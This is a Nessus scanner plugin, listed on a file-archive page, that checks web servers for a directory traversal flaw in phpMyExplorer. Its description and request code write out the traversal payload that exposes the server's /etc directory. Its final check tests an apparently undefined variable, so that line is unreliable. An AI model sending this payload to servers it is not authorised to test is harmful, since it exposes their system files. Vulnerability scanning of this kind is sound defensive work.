home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / phpMyExplorer.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  68 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10750);
  10.  script_bugtraq_id(3266);
  11.  script_version ("$Revision: 1.14 $");
  12.  script_cve_id("CAN-2001-1168");
  13.  
  14.  name["english"] = "phpMyExplorer dir traversal";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "phpMyExplorer is vulnerable to a 
  18. directory traversal attack which allows anyone to
  19. make the remote web server read and display arbitrary
  20. directories.
  21.  
  22. Example:
  23.     GET /index.php?chemin=..%2F..%2F..%2F..%2F%2Fetc
  24.  
  25. will return the content of the remote /etc directory
  26.  
  27. Solution: Contact your vendor for the latest software release.
  28. Risk factor : High";
  29.  
  30.  script_description(english:desc["english"]);
  31.  
  32.  summary["english"] = "phpMyExplorer dir traversal";
  33.  script_summary(english:summary["english"]);
  34.  
  35.  script_category(ACT_GATHER_INFO);
  36.  
  37.  
  38.  script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison");
  39.  family["english"] = "CGI abuses";
  40.  family["francais"] = "Abus de CGI";
  41.  script_family(english:family["english"], francais:family["francais"]);
  42.  script_dependencie("find_service.nes", "http_version.nasl");
  43.  script_require_ports("Services/www", 80);
  44.  exit(0);
  45. }
  46.  
  47. #
  48. # The script code starts here
  49. #
  50.  
  51. include("http_func.inc");
  52. include("http_keepalive.inc");
  53.  
  54. port = get_http_port(default:80);
  55.  
  56. if(!get_port_state(port))exit(0);
  57. if(!can_host_php(port:port))exit(0);
  58.  
  59.  
  60. foreach dir (cgi_dirs())
  61. {
  62.   buf = string(dir, "/index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc");
  63.   buf = http_get(item:buf, port:port);
  64.   r = http_keepalive_send_recv(port:port, data:buf);
  65.   if( r == NULL ) exit(0);
  66.   if("resolv.conf" >< rep)security_hole(port);
  67. }
  68.